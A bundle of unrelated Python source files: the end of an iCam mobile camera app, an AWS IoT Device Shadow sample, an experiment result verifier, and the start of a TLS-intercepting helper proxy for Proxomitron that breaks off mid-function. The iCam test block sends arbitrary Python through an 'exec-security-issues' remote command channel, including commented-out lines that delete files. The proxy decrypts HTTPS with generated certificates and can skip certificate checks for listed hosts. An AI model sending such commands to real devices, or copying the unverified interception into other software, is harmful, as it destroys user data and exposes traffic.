# On WINDOWS_OS, this can give exception because BLUETOOTH_INBOX_PATH == None. This is acceptable...
# UploadText(myText, ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT)
UploadGZippedData(deviceId, myTextInit, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
global STORE_STATE
STORE_STATE = False
try:
SetUploadedPhotoResolutionIndex(photoResolutionIndex)()
SetPhotoQuality(photoQuality)()
# Can take it out, since the implementation does not change anything from
# the menu.
SetPauseInterval(pauseInterval)()
# e32.ao_sleep(5)
SetDigitalZoom(digitalZoom)()
except:
DebugPrintErrorTrace()
STORE_STATE = True
SetMenu()
StoreState()
"""
DebugPrint("Main(): Calling myTimer.after(..., ReactiveLoop).")
# To avoid getting "Photo request ongoing" exception, because the
# view-finder is started in SetDigitalZoom, but SetPauseInterval calls a
# take_photo().
#e32.ao_sleep(1)
try:
# Wait for 10 seconds - Nokia 6680 takes long to start the application.
myTimer.after(10, ReactiveLoop)
except:
DebugPrint("Main(): myTimer.after(..., ReactiveLoop) returned " \
"exception.")
DebugPrintErrorTrace()
"""
"""
#if phoneModel in ["NokiaE7", "NokiaN8"]:
if SYMBIAN_3:
SetUIOrientation(1)
"""
def MainTestCommands():
global bluetoothMode
return
"""
# ######################A TEST - EXOTIC COMMANDS, ETC######################
"""
# We get: "SyntaxError: invalid syntax"
#ExecuteCommands("exec-security-issues import glob; for filename " \
# "in glob.glob('E:/iCam/std*.txt'): print filename")
# ExecuteCommands("exec-security-issues import glob; " \
# "lst = glob.glob('Z:\\iCam\\std*.txt'); print lst")
# I get "SyntaxError: invalid syntax" (Note: we used list comprehension)
#ExecuteCommands("exec-security-issues import glob; " \
# "lst = glob.glob('Z:\\iCam\\std*.txt'); " \
# "print elem for elem in lst")
# print is not a function in Py 2.x
# ExecuteCommands("exec-security-issues import glob; " \
# "lst = glob.glob('Z:\\iCam\\std*.txt'); map(print, lst)")
if True:
# if False:
#ExecuteCommands("exec-security-issues import glob; " \
# "lst = glob.glob('Z:\\iCam\\std*.txt'); print lst; " \
# "map(os.remove, lst)")
# GOOD:
#ExecuteCommands("exec-security-issues import glob; " \
# "lst = glob.glob('Z:\\iCam\\std*.txt'); lst.remove(0); " \
# "lst.remove(0); print lst; map(os.remove, lst)")
# It works
#ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
# "print aStr")
# I get "SyntaxError: invalid syntax":
#ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
# "if (aStr[0] == 'a'): print aStr")
# I get " SyntaxError: unexpected EOF while parsing":
#ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
# "print aStr if (aStr[0] == 'a')")
if False:
# I get "SyntaxError: invalid syntax".
#ExecuteCommands("exec-security-issues " \
# "lst = os.listdir('Z:\\iCam'); def MyFunc(aStr): "\
# "if (aStr[0] == 'a'): print aStr; map(MyFunc, lst)")
# It works:
ExecuteCommands("exec-security-issues " \
"lst = os.listdir('Z:\\iCam'); " \
"lst2 = [elem + 'Alex' for elem in lst]; " \
"print lst2")
if False:
#ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
# "os.remove(aStr) if (aStr[len(aStr) - 4:] == '.txt') " \
# "else None")
# This is OK.
# ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
# "print aStr if (aStr[len(aStr) - 4:] == 'abla') else None")
# This is OK.
ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
"print aStr if (aStr[len(aStr) - 4:] == 'abla') " \
"else None; MyFunc('abla')")
# ExecuteCommands("exec-security-issues MyFunc('abla')")
if False:
# It actually puts all statements inside the body of MyFunc()
ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
"return aStr if (aStr[len(aStr) - 4:] == '.txt') " \
"else None; lst = os.listdir('Z:\\iCam'); print lst; "\
"lst2 = map(MyFunc, lst); print lst2")
if True:
# It works - note that we used instead of a standard for loop with range a list comprehension - because it was giving parsing errors
ExecuteCommands("exec-security-issues " \
# "btMsgList = bluetoothInbox.list_messages(0x10009ED5); " \
"btMsgList = [1, 2, 3, 4, 5, 6, 7, 8, 9]; " \
"[ BluetoothDeleteMessage(btMsgList[i]) for i in range(100) ]")
if False:
# We get "SyntaxError: invalid syntax" seems because of the for
ExecuteCommands("exec-security-issues " \
"btMsgList = bluetoothInbox.list_messages(0x10009ED5); " \
"for i in range(100): " \
"BluetoothDeleteMessage(btMsgList[i])")
if True:
ExecuteCommands("exec-security-issues def MyFuncLocal(aStr): "\
"return aStr if (aStr[len(aStr) - 4:] == '.txt') " \
"else None; lst = os.listdir('Z:\\iCam'); print lst; "\
"lst2 = map(MyFunc, lst); print lst2")
ExecuteCommands("exec-security-issues def MyFunc(aStr): " \
"return aStr if (aStr[len(aStr) - 4:] == '.txt') " \
"else None; lst = os.listdir('Z:\\iCam'); print lst; "\
"lst2 = map(MyFunc, lst); print lst2")
# ExecuteCommands("exec-security-issues import glob; " \
# "lst = glob.glob('Z:/iCam/std*.txt'); " \
# "for filename in lst: print filename")
quit()
"""
Test sending a file via Bluetooth on the desktop - the file to be sent
is specified in inputVideoFile and will get saved on the disk.
"""
inputVideoFile = "Z:/1PhD/ReVival/iCamViewer/2010_06_22_16_05_29_1.3gp"
videoFileName = "2010_06_22_16_05_29_1.3gp"
videoPathFileName = inputVideoFile
cameraId = 0
#res = UploadStateAndFileAndStoreState(deviceId, videoFileName, cameraId,
# OUTPUT_VIDEO_PATH_FILENAME, ICAM_SERVER_NAME,
# WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
# BT client
bluetoothMode = 2
# IMEI_WinOS
res = UploadStateAndFileAndStoreState(deviceId, cameraId,
videoFileName, videoPathFileName,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_STATE_AND_FILE,
singleThreaded=False)
quit()
if WINDOWS_OS:
execfile("iCamWinTest.py") # !!!!TODO: do import iCamWinTest and use iCamWinTest. where required
def MainStartReactiveLoops():
global startAutomatically, startButtonPressed, uploadMediaToYouTube
DebugPrint("Entered MainStartReactiveLoops().")
# We put them after "Started application"... - this is more natural, since
# we want the application to send to server at least "Started"... :)
AutoUpdate()
if pauseInterval != 0:
# if (pauseInterval != 0) and (deviceId != IMEI_N95):
if conserveEnergy or (uploadUnsentData != 2) and \
(uploadUnsentData != 3):
pass
else:
#if conserveEnergy or (uploadUnsentData != 2 and uploadUnsentData != 3):
UploadUnsentLogs()
if deviceId in [IMEI_HTC_TC, IMEI_6120, IMEI_6680, IMEI_N82, IMEI_N95]:
startAutomatically = True
if startAutomatically:
startButtonPressed = True
if bluetoothMode != 2:
"""
If this is a BT client device then we
normally can't connect to the Internet.
Especially for Symbian OS phones this is a good idea
since if it doesn't have an AcessPoint (which is normally
the case) it will ask when calling this function for
the AP, which will basically block the application.
"""
LogToYouTubePlaylist()
if ANDROID_OS:
if startButtonPressed:
ReactiveLoop()
else:
# We do a non-busy waiting forever loop.
while True:
time.sleep(3600.0)
elif SYMBIAN_S60_OS:
#elif SYMBIAN_OS:
if deviceId in [IMEI_G810]:
#if deviceId in [IMEI_E7, IMEI_G810]:
# global uploadMediaToYouTube
uploadMediaToYouTube = True
if youtubeClientAlreadyConnected == False:
if gdataModulesImported == False:
ImportGdataModules()
connResult = ConnectToYouTubeGData()
GetYouTubeUserProfile()
if startButtonPressed:
ReactiveLoop()
elif SYMBIAN_UIQ_OS:
pass
elif iOS_PYOBJC:
try:
ReactiveLoop()
except:
#[self presentModalViewController:ipc animated:YES]
# self.presentModalViewController_animated_(ipc, True)
# I get AttributeError: 'PYApplication' object has no attribute
# 'presentModalViewController_animated_':
#UIApplicationInstance.presentModalViewController_animated_(ipc, objC.YES)
# Not good I think: self.presentModalViewController_(ipc)
# self.animated_(True)
DebugPrintErrorTrace()
elif WINDOWS_CE_OS_PYTHONCE:
# ReactiveLoop()
ReactiveLoop()
elif WINDOWS_OS:
#execfile("iCamWinTest.py") # execfile() doesn't work well when executed in a function
TestWINDOWS_OS()
elif RASPBIAN_OS:
# ReactiveLoop()
ReactiveLoop()
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
# The application waits for the signal from Quit(), in order to exit.
appLock.wait()
###############################################################################
###############################################################################
###############################################################################
###########################END PROGRAM Main()##################################
###############################################################################
###############################################################################
"""
try:
# !!!!This implies that if I want to change uploadMediaToYouTube or
# uploadMediaToPicasa, I have to quit the app to allow loading these
# modules.
if uploadMediaToYouTube or uploadMediaToPicasa:
import atom
import gdata.media
if uploadMediaToYouTube:
import gdata.youtube
import gdata.youtube.service
if uploadMediaToPicasa:
import gdata.photos
# Gives MemoryError if I use default.py the plain text script
import gdata.photos.service
#import gdata.tlslite.utils.Python_AES
gdataModulesImported = True
except:
#gdataModulesImported = False
DebugPrint("Unable to import the gdata (and atom) modules.")
DebugPrintErrorTrace()
"""
# displayInfo = -1 # None
# It is a function defined later. (I should not define it None).
menuTable = {
"00Start": (u"Start Broadcasting", ReactiveLoopOnlyIfStartButtonNotAlreadyPressed, None, None),
# See http://developer.android.com/reference/android/R.drawable.html for the various icon name strings.
"00Stop": (u"Stop Broadcasting", StopBroadcasting, None, None),
"01CaptureWhat": (u"Capture What", CaptureWhatMenu, None, None),
# x icon - "ic_delete"
#"0Exit": (u"Exit", Quit, None, None),
# !!!!not used
# x icon - "ic_delete"
"0Exit": (u"Stop", ReactiveLoopStop, None, None),
#"0Servers": (u"YouTube/Picasa", SelectServersMenu, None, None),
"0Servers": (u"Select Servers", SelectServersMenu, None, None),
"Display_Info": (u"Display Info", DisplayExtensiveInfo, None, None),
# pencil icon "ic_menu_edit"
"1Pause_Interval": (u"Pause Interval", PauseIntervalMenu, None, None),
#"1Record_Duration_Main": (u"Record Config", SetRecordDurationMenu(0), None, None),
"1Record_Config": (u"Record Config", RecordConfigMenu, None, None),
"Select_BT_Mode": (u"Bluetooth Intranet", SelectBluetoothMode, None, None),
# Only used by the PyS60 version:
"Settings": (u"Settings", None, None, None),
# Only used by the Android version:
"zzMisc": (u"Misc", MiscellaneousSettingsMenu, None, None)
}
if SYMBIAN_OS:
START_USER_EMULATOR = False
if START_USER_EMULATOR:
DebugPrint("Starting UserEmulator.")
try:
#UserEmulator said:"Argument doesn't contain any valid script name!"
#res = e32.start_exe(r"C:\sys\bin\UserEmulator_0x2001C3AF.exe",
# "E:\\Start_JoikuSpot.xml")
# Note: UserEmulator seems must not be started for the script to
# execute well.
resGlobal = e32.start_exe(r"C:\sys\bin\UserEmulator_0x2001C3AF.exe",
"Start_JoikuSpot.xml")
#resGlobal = e32.start_exe(
# r"C:\sys\bin\UserEmulator_0x2001C3AF.exe", "Alex.xml")
DebugPrint(" e32.start_exe() returned %s." % str(resGlobal))
except:
DebugPrintErrorTrace()
if __name__ == "__main__":
Main()
#figleaf.stop()
#figleaf.write_coverage('.figleaf')
|
shadow.py | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0.
import argparse
from awscrt import auth, io, mqtt, http
from awsiot import iotshadow
from awsiot import mqtt_connection_builder
from concurrent.futures import Future
import sys
import threading
import traceback
from uuid import uuid4
# - Overview -
# This sample uses the AWS IoT Device Shadow Service to keep a property in
# sync between device and server. Imagine a light whose color may be changed
# through an app, or set by a local user.
#
# - Instructions -
# Once connected, type a value in the terminal and press Enter to update
# the property's "reported" value. The sample also responds when the "desired"
# value changes on the server. To observe this, edit the Shadow document in
# the AWS Console and set a new "desired" value.
#
# - Detail -
# On startup, the sample requests the shadow document to learn the property's
# initial state. The sample also subscribes to "delta" events from the server,
# which are sent when a property's "desired" value differs from its "reported"
# value. When the sample learns of a new desired value, that value is changed
# on the device and an update is sent to the server with the new "reported"
# value.
parser = argparse.ArgumentParser(description="Device Shadow sample keeps a property in sync across client and server")
parser.add_argument('--endpoint', required=True, help="Your AWS IoT custom endpoint, not including a port. " +
"Ex: \"w6zbse3vjd5b4p-ats.iot.us-west-2.amazonaws.com\"")
parser.add_argument('--cert', help="File path to your client certificate, in PEM format")
parser.add_argument('--key', help="File path to your private key file, in PEM format")
parser.add_argument('--root-ca', help="File path to root certificate authority, in PEM format. " +
"Necessary if MQTT server uses a certificate that's not already in " +
"your trust store")
parser.add_argument('--client-id', default="test-" + str(uuid4()), help="Client ID for MQTT connection.")
parser.add_argument('--thing-name', required=True, help="The name assigned to your IoT Thing")
parser.add_argument('--shadow-property', default="color", help="Name of property in shadow to keep in sync")
parser.add_argument('--use-websocket', default=False, action='store_true',
help="To use a websocket instead of raw mqtt. If you " +
"specify this option you must specify a region for signing.")
parser.add_argument('--signing-region', default='us-east-1', help="If you specify --use-web-socket, this " +
"is the region that will be used for computing the Sigv4 signature")
parser.add_argument('--proxy-host', help="Hostname of proxy to connect to.")
parser.add_argument('--proxy-port', type=int, default=8080, help="Port of proxy to connect to.")
parser.add_argument('--verbosity', choices=[x.name for x in io.LogLevel], default=io.LogLevel.NoLogs.name,
help='Logging level')
# Using globals to simplify sample code
is_sample_done = threading.Event()
mqtt_connection = None
shadow_client = None
thing_name = ""
shadow_property = ""
SHADOW_VALUE_DEFAULT = "off"
class LockedData:
def __init__(self):
self.lock = threading.Lock()
self.shadow_value = None
self.disconnect_called = False
locked_data = LockedData()
# Function for gracefully quitting this sample
def exit(msg_or_exception):
if isinstance(msg_or_exception, Exception):
print("Exiting sample due to exception.")
traceback.print_exception(msg_or_exception.__class__, msg_or_exception, sys.exc_info()[2])
else:
print("Exiting sample:", msg_or_exception)
with locked_data.lock:
if not locked_data.disconnect_called:
print("Disconnecting...")
locked_data.disconnect_called = True
future = mqtt_connection.disconnect()
future.add_done_callback(on_disconnected)
def on_disconnected(disconnect_future):
# type: (Future) -> None
print("Disconnected.")
# Signal that sample is finished
is_sample_done.set()
def on_get_shadow_accepted(response):
# type: (iotshadow.GetShadowResponse) -> None
try:
print("Finished getting initial shadow state.")
with locked_data.lock:
if locked_data.shadow_value is not None:
print(" Ignoring initial query because a delta event has already been received.")
return
if response.state:
if response.state.delta:
value = response.state.delta.get(shadow_property)
if value:
print(" Shadow contains delta value '{}'.".format(value))
change_shadow_value(value)
return
if response.state.reported:
value = response.state.reported.get(shadow_property)
if value:
print(" Shadow contains reported value '{}'.".format(value))
set_local_value_due_to_initial_query(response.state.reported[shadow_property])
return
print(" Shadow document lacks '{}' property. Setting defaults...".format(shadow_property))
change_shadow_value(SHADOW_VALUE_DEFAULT)
return
except Exception as e:
exit(e)
def on_get_shadow_rejected(error):
# type: (iotshadow.ErrorResponse) -> None
if error.code == 404:
print("Thing has no shadow document. Creating with defaults...")
change_shadow_value(SHADOW_VALUE_DEFAULT)
else:
exit("Get request was rejected. code:{} message:'{}'".format(
error.code, error.message))
def on_shadow_delta_updated(delta):
# type: (iotshadow.ShadowDeltaUpdatedEvent) -> None
try:
print("Received shadow delta event.")
if delta.state and (shadow_property in delta.state):
value = delta.state[shadow_property]
if value is None:
print(" Delta reports that '{}' was deleted. Resetting defaults...".format(shadow_property))
change_shadow_value(SHADOW_VALUE_DEFAULT)
return
else:
print(" Delta reports that desired value is '{}'. Changing local value...".format(value))
change_shadow_value(value)
else:
print(" Delta did not report a change in '{}'".format(shadow_property))
except Exception as e:
exit(e)
def on_publish_update_shadow(future):
#type: (Future) -> None
try:
future.result()
print("Update request published.")
except Exception as e:
print("Failed to publish update request.")
exit(e)
def on_update_shadow_accepted(response):
# type: (iotshadow.UpdateShadowResponse) -> None
try:
print("Finished updating reported shadow value to '{}'.".format(response.state.reported[shadow_property])) # type: ignore
print("Enter desired value: ") # remind user they can input new values
except:
exit("Updated shadow is missing the target property.")
def on_update_shadow_rejected(error):
# type: (iotshadow.ErrorResponse) -> None
exit("Update request was rejected. code:{} message:'{}'".format(
error.code, error.message))
def set_local_value_due_to_initial_query(reported_value):
with locked_data.lock:
locked_data.shadow_value = reported_value
print("Enter desired value: ") # remind user they can input new values
def change_shadow_value(value):
with locked_data.lock:
if locked_data.shadow_value == value:
print("Local value is already '{}'.".format(value))
print("Enter desired value: ") # remind user they can input new values
return
print("Changed local shadow value to '{}'.".format(value))
locked_data.shadow_value = value
print("Updating reported shadow value to '{}'...".format(value))
request = iotshadow.UpdateShadowRequest(
thing_name=thing_name,
state=iotshadow.ShadowState(
reported={ shadow_property: value },
desired={ shadow_property: value },
)
)
future = shadow_client.publish_update_shadow(request, mqtt.QoS.AT_LEAST_ONCE)
future.add_done_callback(on_publish_update_shadow)
def user_input_thread_fn():
while True:
try:
# Read user input
new_value = input()
# If user wants to quit sample, then quit.
# Otherwise change the shadow value.
if new_value in ['exit', 'quit']:
exit("User has quit")
break
else:
change_shadow_value(new_value)
except Exception as e:
print("Exception on input thread.")
exit(e)
break
if __name__ == '__main__':
# Process input args
args = parser.parse_args()
thing_name = args.thing_name
shadow_property = args.shadow_property
io.init_logging(getattr(io.LogLevel, args.verbosity), 'stderr')
# Spin up resources
event_loop_group = io.EventLoopGroup(1)
host_resolver = io.DefaultHostResolver(event_loop_group)
client_bootstrap = io.ClientBootstrap(event_loop_group, host_resolver)
proxy_options = None
if (args.proxy_host):
proxy_options = http.HttpProxyOptions(host_name=args.proxy_host, port=args.proxy_port)
if args.use_websocket == True:
credentials_provider = auth.AwsCredentialsProvider.new_default_chain(client_bootstrap)
mqtt_connection = mqtt_connection_builder.websockets_with_default_aws_signing(
endpoint=args.endpoint,
client_bootstrap=client_bootstrap,
region=args.signing_region,
credentials_provider=credentials_provider,
http_proxy_options=proxy_options,
ca_filepath=args.root_ca,
client_id=args.client_id,
clean_session=True,
keep_alive_secs=6)
else:
mqtt_connection = mqtt_connection_builder.mtls_from_path(
endpoint=args.endpoint,
cert_filepath=args.cert,
pri_key_filepath=args.key,
client_bootstrap=client_bootstrap,
ca_filepath=args.root_ca,
client_id=args.client_id,
clean_session=True,
keep_alive_secs=6,
http_proxy_options=proxy_options)
print("Connecting to {} with client ID '{}'...".format(
args.endpoint, args.client_id))
connected_future = mqtt_connection.connect()
shadow_client = iotshadow.IotShadowClient(mqtt_connection)
# Wait for connection to be fully established.
# Note that it's not necessary to wait, commands issued to the
# mqtt_connection before its fully connected will simply be queued.
# But this sample waits here so it's obvious when a connection
# fails or succeeds.
connected_future.result()
print("Connected!")
try:
# Subscribe to necessary topics.
# Note that is **is** important to wait for "accepted/rejected" subscriptions
# to succeed before publishing the corresponding "request".
print("Subscribing to Update responses...")
update_accepted_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_accepted(
request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_update_shadow_accepted)
update_rejected_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_rejected(
request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_update_shadow_rejected)
# Wait for subscriptions to succeed
update_accepted_subscribed_future.result()
update_rejected_subscribed_future.result()
print("Subscribing to Get responses...")
get_accepted_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_accepted(
request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_get_shadow_accepted)
get_rejected_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_rejected(
request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_get_shadow_rejected)
# Wait for subscriptions to succeed
get_accepted_subscribed_future.result()
get_rejected_subscribed_future.result()
print("Subscribing to Delta events...")
delta_subscribed_future, _ = shadow_client.subscribe_to_shadow_delta_updated_events(
request=iotshadow.ShadowDeltaUpdatedSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_shadow_delta_updated)
# Wait for subscription to succeed
delta_subscribed_future.result()
# The rest of the sample runs asyncronously.
# Issue request for shadow's current state.
# The response will be received by the on_get_accepted() callback
print("Requesting current shadow state...")
publish_get_future = shadow_client.publish_get_shadow(
request=iotshadow.GetShadowRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE)
# Ensure that publish succeeds
publish_get_future.result()
# Launch thread to handle user input.
# A "daemon" thread won't prevent the program from shutting down.
print("Launching thread to read user input...")
user_input_thread = threading.Thread(target=user_input_thread_fn, name='user_input_thread')
user_input_thread.daemon = True
user_input_thread.start()
except Exception as e:
exit(e)
# Wait for the sample to finish (user types 'quit', or an error occurs)
is_sample_done.wait()
|
verifier.py | """Ensure that the output produced by each test program is identical."""
__all__ = [
'Verifier',
]
import pickle
from itertools import groupby
from operator import itemgetter
import os
from multiprocessing import Process
from frexp.workflow import Task
class Verifier(Task):
"""Run each test once and ensure that different progs agree
on the results.
"""
# At any given time, we only hold onto the current test result
# and the one we're trying to match it to. This avoids consuming
# more memory as the number of tests increases, and it also avoids
# additional unnecessary serialization work.
# TODO: If it turns out that equality comparison among large sets
# ends up being a limiting factor, we can turn this into a hash-
# based or sort-based equality. This would probably require a
# recursive traversal, similar to how canonization is done.
# Copied from Runner, should refactor.
def dispatch_test(self, dataset, prog, other_tparams):
"""Spawn a driver process and get its result."""
# Communicate the dataset and results via a temporary
# pipe file.
pipe_fn = self.workflow.pipe_filename
with open(pipe_fn, 'wb') as pf:
pickle.dump((dataset, prog, other_tparams), pf)
child = Process(target=self.workflow.ExpVerifyDriver, args=(pipe_fn,))
child.start()
child.join()
with open(pipe_fn, 'rb') as pf:
results = pickle.load(pf)
os.remove(pipe_fn)
return results
def run(self):
with open(self.workflow.params_filename, 'rb') as in_file:
tparams_list = pickle.load(in_file)
# Determine which tests were actually run (i.e. didn't time out).
with open(self.workflow.data_filename, 'rb') as in_file:
datapoints = pickle.load(in_file)
datapoint_tidprogs = set((d['tid'], d['prog']) for d in datapoints)
tparams_list.sort(key=itemgetter('tid'))
tgroups = groupby(tparams_list, itemgetter('tid'))
tgroups = [(tid, list(tgs)) for tid, tgs in tgroups]
for i, (tid, tgs) in enumerate(tgroups):
itemstr = 'Verifying trial group {:<10} ({}/{})\n '.format(
tid + ' ...', i, len(tgroups))
self.print(itemstr, end='')
goal = None
goalprog = None
for trial in tgs:
trial = dict(trial)
dsid = trial.pop('dsid')
prog = trial.pop('prog')
# Skip if this one timed out.
if (tid, prog) not in datapoint_tidprogs:
print('Skipping ' + prog, end=' ')
continue
self.print(prog, end=' ')
ds_fn = self.workflow.get_ds_filename(dsid)
with open(ds_fn, 'rb') as dsfile:
dataset = pickle.load(dsfile)
output = self.dispatch_test(dataset, prog, trial)['output']
if goal is None:
goal = output
goalprog = prog
else:
if output != goal:
self.print()
self.print('Output disagrees for trial group ' + tid)
self.print(' params: ' + str(dataset['dsparams']))
self.print(' goalprog: {}, prog: {}'.format(
goalprog, prog))
return
self.print()
self.print('Output agrees on all datasets.')
self.print('Done.')
|
ProxHTTPSProxy.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"A Proxomitron Helper Program"
_name = 'ProxHTTPSProxyMII'
__author__ = 'phoenix'
__version__ = 'v1.5'
CONFIG = "/etc/ProxHTTPSProxy/config/config.ini"
CA_CERTS = "/etc/ProxHTTPSProxy/cert/cacert.pem"
import os
import time
import configparser
import fnmatch
import logging
import threading
import ssl
import urllib3
from urllib3.contrib.socks import SOCKSProxyManager
#https://urllib3.readthedocs.org/en/latest/security.html#insecurerequestwarning
#urllib3.disable_warnings()
from socketserver import ThreadingMixIn
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse
from ProxyTool import ProxyRequestHandler, get_cert, counter
from colorama import init, Fore, Back, Style
init(autoreset=True)
class LoadConfig:
def __init__(self, configfile):
self.config = configparser.ConfigParser(allow_no_value=True,
inline_comment_prefixes=('#',))
self.config.read(configfile)
self.PROXADDR = self.config['GENERAL'].get('ProxAddr')
self.FRONTPORT = int(self.config['GENERAL'].get('FrontPort'))
self.REARPORT = int(self.config['GENERAL'].get('RearPort'))
self.DEFAULTPROXY = self.config['GENERAL'].get('DefaultProxy')
self.LOGLEVEL = self.config['GENERAL'].get('LogLevel')
class ConnectionPools:
"""
self.pools is a list of {'proxy': 'http://127.0.0.1:8080',
'pool': urllib3.ProxyManager() object,
'patterns': ['ab.com', 'bc.net', ...]}
self.getpool() is a method that returns pool based on host matching
"""
# Windows default CA certificates are incomplete
# See: http://bugs.python.org/issue20916
# cacert.pem sources:
# - http://curl.haxx.se/docs/caextract.html
# - http://certifi.io/en/latest/
# ssl_version="TLSv1" to specific version
sslparams = dict(cert_reqs="REQUIRED", ca_certs=CA_CERTS)
# IE: http://support2.microsoft.com/kb/181050/en-us
# Firefox about:config
# network.http.connection-timeout 90
# network.http.response.timeout 300
timeout = urllib3.util.timeout.Timeout(connect=90.0, read=300.0)
def __init__(self, config):
self.file = config
self.file_timestamp = os.path.getmtime(config)
self.loadConfig()
def loadConfig(self):
# self.conf has to be inited each time for reloading
self.conf = configparser.ConfigParser(allow_no_value=True, delimiters=('=',),
inline_comment_prefixes=('#',))
self.conf.read(self.file)
self.pools = []
proxy_sections = [section for section in self.conf.sections()
if section.startswith('PROXY')]
for section in proxy_sections:
proxy = section.split()[1]
self.pools.append(dict(proxy=proxy,
pool=self.setProxyPool(proxy),
patterns=list(self.conf[section].keys())))
default_proxy = self.conf['GENERAL'].get('DefaultProxy')
default_pool = (self.setProxyPool(default_proxy) if default_proxy else
[urllib3.PoolManager(num_pools=10, maxsize=8, timeout=self.timeout, **self.sslparams),
urllib3.PoolManager(num_pools=10, maxsize=8, timeout=self.timeout)])
self.pools.append({'proxy': default_proxy, 'pool': default_pool, 'patterns': '*'})
self.noverifylist = list(self.conf['SSL No-Verify'].keys())
self.blacklist = list(self.conf['BLACKLIST'].keys())
self.sslpasslist = list(self.conf['SSL Pass-Thru'].keys())
self.bypasslist = list(self.conf['BYPASS URL'].keys())
def reloadConfig(self):
while True:
mtime = os.path.getmtime(self.file)
if mtime > self.file_timestamp:
self.file_timestamp = mtime
self.loadConfig()
logger.info(Fore.RED + Style.BRIGHT
+ "*" * 20 + " CONFIG RELOADED " + "*" * 20)
time.sleep(1)
def getpool(self, host, httpmode=False):
noverify = True if httpmode or any((fnmatch.fnmatch(host, pattern) for pattern in self.noverifylist)) else False
for pool in self.pools:
if any((fnmatch.fnmatch(host, pattern) for pattern in pool['patterns'])):
return pool['proxy'], pool['pool'][noverify], noverify
def setProxyPool(self, proxy):
scheme = proxy.split(':')[0]
if scheme in ('http', 'https'):
ProxyManager = urllib3.ProxyManager
elif scheme in ('socks4', 'socks5'):
ProxyManager = SOCKSProxyManager
else:
print("Wrong Proxy Format: " + proxy)
print("Proxy should start with http/https/socks4/socks5 .")
input()
raise SystemExit
# maxsize is the max. number of connections to the same server
return [ProxyManager(proxy, num_pools=10, maxsize=8, timeout=self.timeout, **self.sslparams),
ProxyManager(proxy, num_pools=10, maxsize=8, timeout=self.timeout)]
class FrontServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
pass
class RearServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
pass
class FrontRequestHandler(ProxyRequestHandler):
"""
Sit between the client and Proxomitron
Convert https request to http
"""
server_version = "%s FrontProxy/%s" % (_name, __version__)
def do_CONNECT(self):
"Decrypt https request and dispatch to http handler"
# request line: CONNECT www.example.com:443 HTTP/1.1
self.host, self.port = self.path.split(":")
self.proxy, self.pool, self.noverify = pools.getpool(self.host)
if any((fnmatch.fnmatch(self.host, pattern) for pattern in pools.blacklist)):
# BLACK LIST
self.deny_request()
logger.info("%03d " % self.reqNum + Fore.CYAN + 'Denied by blacklist: %s' % self.host)
elif any((fnmatch.fnmatch(self.host, pattern) for pattern in pools.sslpasslist)):
# SSL Pass-Thru
if self.proxy and self.proxy.startswith('https'):
self.forward_to_https_proxy()
elif self.proxy and self.proxy.startswith('socks5'):
self.forward_to_socks5_proxy()
else:
self.tunnel_traffic()
# Upstream server or proxy of the tunnel is closed explictly, so we close the local connection too
self.close_connection = 1
else:
# SSL MITM
self.wfile.write(("HTTP/1.1 200 Connection established\r\n" +
"Proxy-agent: %s\r\n" % self.version_string() +
"\r\n").encode('ascii'))
# commonname = '.' + self.host.partition('.')[-1] if self.host.count('.') >= 2 else self.host
commonname = self.host
dummycert = get_cert(commonname)
# set a flag for do_METHOD
self.ssltunnel = True
ssl_sock = ssl.wrap_socket(self.connection, keyfile=dummycert, certfile=dummycert, server_side=True)
# Ref: Lib/socketserver.py#StreamRequestHandler.setup()
self.connection = ssl_sock
self.rfile = self.connection.makefile('rb', self.rbufsize)
self.wfile = self.connection.makefile('wb', self.wbufsize)
# dispatch to do_METHOD()
self.handle_one_request()
def do_METHOD(self):
"Forward request to Proxomitron"
counter.increment_and_set(self, 'reqNum')
if self.ssltunnel:
# https request
host = self.host if self.port == '443' else "%s:%s" % (self.host, self.port)
url = "https://%s%s" % (host, self.path)
self.bypass = any((fnmatch.fnmatch(url, pattern) for pattern in pools.bypasslist))
if not self.bypass:
url = "http://%s%s" % (host, self.path)
# Tag the request so Proxomitron can recognize it
self.headers["Tagged"] = self.version_string() + ":%d" % self.reqNum
else:
# http request
self.host = urlparse(self.path).hostname
if any((fnmatch.fnmatch(self.host, pattern) for pattern in pools.blacklist)):
# BLACK LIST
self.deny_request()
logger.info("%03d " % self.reqNum + Fore.CYAN + 'Denied by blacklist: %s' % self.host)
return
host = urlparse(self.path).netloc
self.proxy, self.pool, self.noverify = pools.getpool(self.host, httpmode=True)
self.bypass = any((fnmatch.fnmatch('http://' + host + urlparse(self.path).path, pattern) for pattern in pools.bypasslist))
url = self.path
self.url = url
pool = self.pool if self.bypass else proxpool
data_length = self.headers.get("Content-Length")
